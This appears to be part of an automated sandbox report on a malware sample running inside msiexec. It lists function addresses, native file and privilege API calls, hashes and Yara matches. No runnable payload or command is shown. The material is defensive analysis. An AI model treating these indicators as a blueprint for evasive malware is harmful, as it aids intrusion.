                                                                  • Opcode ID: 28d66cf399481c95d32e110020bd23f1ef981db234855bc5189d8a5f907248b6
                                                                  • Instruction ID: 62430bec79222bf9349d0a7138b34b06eb5d2aed0434f732d3b0a64c207ab6d4
                                                                  • Opcode Fuzzy Hash: 28d66cf399481c95d32e110020bd23f1ef981db234855bc5189d8a5f907248b6
                                                                  • Instruction Fuzzy Hash: 1EF092B2200108AFCB14DF99DC85EEB7BADEF8D754F158249FA0DA7241D670E911CBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0063C760 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtCreateFile.NTDLL(00000060,00000000,?,006374DC,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,006374DC,?,00000000,00000060,00000000,00000000), ref: 0063C7AD
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                  • Instruction ID: f7bbd56edcac523265bcb475cc0d6b86d258ec87007f6382198f2ca37242a88a
                                                                  • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                  • Instruction Fuzzy Hash: 4BF06DB2215208ABCB48DF89DC85EEB77ADAF8C754F158248BA0997241D630E8518BA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0063C75B Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtCreateFile.NTDLL(00000060,00000000,?,006374DC,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,006374DC,?,00000000,00000060,00000000,00000000), ref: 0063C7AD
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 0b2f63bc4df748dc29e0f4ed07ba210983120f05ced169b3209592cb89a30aa2
                                                                  • Instruction ID: 6da1a0e6615c75e00aeb2056c49e4e20f5deb3593fdf0fba77419d0818b03337
                                                                  • Opcode Fuzzy Hash: 0b2f63bc4df748dc29e0f4ed07ba210983120f05ced169b3209592cb89a30aa2
                                                                  • Instruction Fuzzy Hash: 7E01CFB2201148AFDB48CF98DC88EEB37A9AF8C754F058248FA4D97241C630EC51CBA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0063C810 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtReadFile.NTDLL(006376A0,00632B68,FFFFFFFF,0063718A,00000002,?,006376A0,00000002,0063718A,FFFFFFFF,00632B68,006376A0,00000002,00000000), ref: 0063C855
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                  • Instruction ID: b08336bab3f6f6c0ee2801826a91806784f382542e3f02477291e0d0cb456811
                                                                  • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                  • Instruction Fuzzy Hash: 7CF0AFB2200208ABCB14DF99DC85EEB77ADAF8C754F118248BA0DA7241D630E8118BA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0063C85A Relevance: 1.5, APIs: 1, Instructions: 22filenativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtDeleteFile.NTDLL(006374A2,00000002,?,006374A2,00000000,00000018,?,?,F162D13C,00000000,?), ref: 0063C885
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DeleteFile
                                                                  • String ID:
                                                                  • API String ID: 4033686569-0
                                                                  • Opcode ID: f2746e53b7bf35a674d76d7889673f54a58e4d5bd5b298cf89611835699b074e
                                                                  • Instruction ID: 3b2b913568af2d6021908bb483ae3edcec6d532cd30265c047848b198acc3e1a
                                                                  • Opcode Fuzzy Hash: f2746e53b7bf35a674d76d7889673f54a58e4d5bd5b298cf89611835699b074e
                                                                  • Instruction Fuzzy Hash: 57E08CB16003146BD710EF98DC8AEC73BA8DF48710F004469BA1D9B242DA74E9108BE1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0063C860 Relevance: 1.5, APIs: 1, Instructions: 20filenativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtDeleteFile.NTDLL(006374A2,00000002,?,006374A2,00000000,00000018,?,?,F162D13C,00000000,?), ref: 0063C885
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DeleteFile
                                                                  • String ID:
                                                                  • API String ID: 4033686569-0
                                                                  • Opcode ID: 9cdb9952ef2d184753929ab23e7c45e026e579668fdbcbf3541df72b633117aa
                                                                  • Instruction ID: 56af5ac7e93653cd82788cfa0cb337b0e18fe770882b94fe7c036ad384823fc2
                                                                  • Opcode Fuzzy Hash: 9cdb9952ef2d184753929ab23e7c45e026e579668fdbcbf3541df72b633117aa
                                                                  • Instruction Fuzzy Hash: E5D017722402186BD610EB98DC89ED77BACDF49B60F018455BA1D5B242C670FA108BE1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0063C88B Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtClose.NTDLL(0062E515,00000000,?,0062E515,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0063C8B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: 6a413986c672f9c4500663bc36cf28119bdd7b8d41ccb101deb52b47a519a9fb
                                                                  • Instruction ID: 6961b4e9ab2c6c8e53456391339530523d618f240243f22f270d613ed9388a0f
                                                                  • Opcode Fuzzy Hash: 6a413986c672f9c4500663bc36cf28119bdd7b8d41ccb101deb52b47a519a9fb
                                                                  • Instruction Fuzzy Hash: 52E0C276200304ABD710EFA4DC45ED73BA9DF88720F018458BE0D5B342C170FA008BE1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0063C890 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtClose.NTDLL(0062E515,00000000,?,0062E515,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0063C8B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                  • Instruction ID: c7ea32b5fe8c09c2093029ea14b6e4b2d3293f4cee805820659d6caea9395f96
                                                                  • Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                  • Instruction Fuzzy Hash: 77D012722002146BD610EB98DC45ED77B5DDF49660F018455BA1D5B242C570F91086E1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04559840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 4316f87a83e4f533631830e080ab35c1162e87723677035d9f642b586bc245b3
                                                                  • Instruction ID: 6c7d0a18f8daef6e00e9f7b911cbcb5092125ed5d168535284aabf721b694b1b
                                                                  • Opcode Fuzzy Hash: 4316f87a83e4f533631830e080ab35c1162e87723677035d9f642b586bc245b3
                                                                  • Instruction Fuzzy Hash: 26900261382045527545B15A44045074056B7E0285791C412A1415A50C8966E85AF661
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04559860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 003f0eba014c2276507bdee331eed3eeff447caa371ffca5355848ef9b64f0be
                                                                  • Instruction ID: 83afdd25ae65ca7680c948c059856f659a3ebcfbff17a0246f7e7ac4a9d889fe
                                                                  • Opcode Fuzzy Hash: 003f0eba014c2276507bdee331eed3eeff447caa371ffca5355848ef9b64f0be
                                                                  • Instruction Fuzzy Hash: B090027134100813F111615A45047070059A7D0285F91C812A0425658D9A96D956F161
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04559540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: f34f51e22ee2ee581f6f0683f4b0982c81a2080dfbcd4f2566871200b3cff7ea
                                                                  • Instruction ID: 138ff9533041fdabb73a5b1f819a79bc89365808601149f154671e7a67a81431
                                                                  • Opcode Fuzzy Hash: f34f51e22ee2ee581f6f0683f4b0982c81a2080dfbcd4f2566871200b3cff7ea
                                                                  • Instruction Fuzzy Hash: 55900265351004033105A55A07045070096A7D5395351C421F1016650CDA61D865B161
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04559560 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: c1e66d6f6a23125467ada337f4916a7af8c87c352eabda5d867acf0d79f58e0e
                                                                  • Instruction ID: a53003d9903db7625e8ec2915aedb219812408ec52e319e0f9f5af76d1533327
                                                                  • Opcode Fuzzy Hash: c1e66d6f6a23125467ada337f4916a7af8c87c352eabda5d867acf0d79f58e0e
                                                                  • Instruction Fuzzy Hash: F3900265361004023145A55A060450B0495B7D6395391C415F1417690CCA61D869B361
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04559910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 7caecf67db23040bc7e68b52137b4126a36733e189b86a459089ecf81bf1c65f
                                                                  • Instruction ID: 788481a68c62550e024d2f97ffe01ea4310495e885cf77b75525c0f356152453
                                                                  • Opcode Fuzzy Hash: 7caecf67db23040bc7e68b52137b4126a36733e189b86a459089ecf81bf1c65f
                                                                  • Instruction Fuzzy Hash: 5A9002B134100802F140715A44047460055A7D0345F51C411A5065654E8A99DDD9B6A5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 045595D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: e8418bea04fa2f72d5a2e12360c779f8368ad42df4cdeae551630194e762ab00
                                                                  • Instruction ID: 8bb298e254a6a5bada137423b29ea9ed6862d2a9f40ceac0b0f10e29fe169556
                                                                  • Opcode Fuzzy Hash: e8418bea04fa2f72d5a2e12360c779f8368ad42df4cdeae551630194e762ab00
                                                                  • Instruction Fuzzy Hash: 439002A1342004037105715A4414616405AA7E0245B51C421E1015690DC965D895B165
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 045599A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: c3fde0283fb0f9c9cd583bcd354e074647d7ed893ce1edd77698df7c26167bbc
                                                                  • Instruction ID: e1c28c127aaa0f3cb32fc037a634f3d8d4cf8f3c7c8a306902168711d5c5d3ec
                                                                  • Opcode Fuzzy Hash: c3fde0283fb0f9c9cd583bcd354e074647d7ed893ce1edd77698df7c26167bbc
                                                                  • Instruction Fuzzy Hash: DD9002A138100842F100615A4414B060055E7E1345F51C415E1065654D8A59DC56B166
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04559A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 0b5911ff0429e2f8a5e85cd46ca697c520b1f0535121825cd354487a434430e5
                                                                  • Instruction ID: 864ec72ba1600a7614ec6db95cb49594eec9a59c445ef05cb91a7953d2d82313
                                                                  • Opcode Fuzzy Hash: 0b5911ff0429e2f8a5e85cd46ca697c520b1f0535121825cd354487a434430e5
                                                                  • Instruction Fuzzy Hash: 2890026135180442F200656A4C14B070055A7D0347F51C515A0155654CCD55D865B561
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 045596D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3d73c8abc811a4698437c66a941bf7a372405bb871c7d94af7dfd3ae8be7c5b5
                                                                  • Instruction ID: 9605f30477e2d8308d9b4efc86e9914e762f8b7577169610e1738ca8484cc752
                                                                  • Opcode Fuzzy Hash: 3d73c8abc811a4698437c66a941bf7a372405bb871c7d94af7dfd3ae8be7c5b5
                                                                  • Instruction Fuzzy Hash: 1C90027134100C42F100615A4404B460055A7E0345F51C416A0125754D8A55D855B561
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 045596E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 36e1f209525ba6b0222b6b89e55fef154c20817ea3a0e4773334a7e54f49b62b
                                                                  • Instruction ID: 32dabee5a39b5b1f4de6006764cb77a05397aedf8974226bccb69ae15997086c
                                                                  • Opcode Fuzzy Hash: 36e1f209525ba6b0222b6b89e55fef154c20817ea3a0e4773334a7e54f49b62b
                                                                  • Instruction Fuzzy Hash: 4790027134108C02F110615A840474A0055A7D0345F55C811A4425758D8AD5D895B161
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04559710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 073de404fca021a59230629f2e032291f73ba5854d3ebbe940b1d2e16a780817
                                                                  • Instruction ID: 1517e96c64813031e80f2b8c9555eabf67e108c61c05a5e2a9aeec2869be22fe
                                                                  • Opcode Fuzzy Hash: 073de404fca021a59230629f2e032291f73ba5854d3ebbe940b1d2e16a780817
                                                                  • Instruction Fuzzy Hash: 8890027134100802F100659A54086460055A7E0345F51D411A5025655ECAA5D895B171
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04559FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: c2cc73a99c35808997fa614ac77462336ebc75879aab6259251f038fe8b0bc07
                                                                  • Instruction ID: d6690d477cd093c609da70f6b79f2bd60e2a111f39af126daf1e0171ba1f58f8
                                                                  • Opcode Fuzzy Hash: c2cc73a99c35808997fa614ac77462336ebc75879aab6259251f038fe8b0bc07
                                                                  • Instruction Fuzzy Hash: 6490027135114802F110615A84047060055A7D1245F51C811A0825658D8AD5D895B162
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04559780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                                  • Associated: 00000004.00000002.513198532.000000000460B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 0b07751ed92cbb90a1a5c159715eeb0f907e9696f8a8cdb89db2a46380875344
                                                                  • Instruction ID: 69c587db199b288607d2148d42e4dcfeca9d460d3981a4148403438c8615cba3
                                                                  • Opcode Fuzzy Hash: 0b07751ed92cbb90a1a5c159715eeb0f907e9696f8a8cdb89db2a46380875344
                                                                  • Instruction Fuzzy Hash: F690026935300402F180715A540860A0055A7D1246F91D815A0016658CCD55D86DB361
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0063CBC1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,b,0062E0E2,?,00000000,?,?), ref: 0063CC00
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LookupPrivilegeValue
                                                                  • String ID: ~"cT$b
                                                                  • API String ID: 3899507212-1155981839
                                                                  • Opcode ID: c2a2af4da3d61573988083e7c8cd680a0c473ef2092f5d3e3f7940d19c0fb83d
                                                                  • Instruction ID: 20cd361f939227ff9d05fcbad4f22b6f4ed9e3a58f3b2d6ef0e4fb4f0bfaf4e2
                                                                  • Opcode Fuzzy Hash: c2a2af4da3d61573988083e7c8cd680a0c473ef2092f5d3e3f7940d19c0fb83d
                                                                  • Instruction Fuzzy Hash: F3012DB52402086FDB14DF98DC41EEB37AEAF89754F054159FE0957242C671E9118BF1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0063B4B0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 92sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID: net.dll$wininet.dll
                                                                  • API String ID: 3472027048-1269752229
                                                                  • Opcode ID: 91be25da158c1f9c3553164e26bdcddaef16e0baad010e9c8e3db7adf74e1549
                                                                  • Instruction ID: 27259c9c41674b6953ee5ea95697cd20131c7ddbd382eb74f273e692e2de4c12
                                                                  • Opcode Fuzzy Hash: 91be25da158c1f9c3553164e26bdcddaef16e0baad010e9c8e3db7adf74e1549
                                                                  • Instruction Fuzzy Hash: 21317AB5A00608ABD714DFA4D881FE6B7E9EB88700F14861EF65E5B285D770A540CBE4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0063B4A4 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID: net.dll$wininet.dll
                                                                  • API String ID: 3472027048-1269752229
                                                                  • Opcode ID: 125705c49bfa26e6f711292bffddbb83c98333b5ed1c7be0e96b7d5c0f4bfd98
                                                                  • Instruction ID: a426f39f63305e5d7604dcee3de39945a7a84bc97bbb13b8145316c7b4011602
                                                                  • Opcode Fuzzy Hash: 125705c49bfa26e6f711292bffddbb83c98333b5ed1c7be0e96b7d5c0f4bfd98
                                                                  • Instruction Fuzzy Hash: 09319CB1A00604ABD714DFA4D8C5FEAB7B9EF88700F10861EE65D5B285D770A540CBE4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0062FCA0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 213COMMON
                                                                  Download Yara Rule
                                                                  APIs
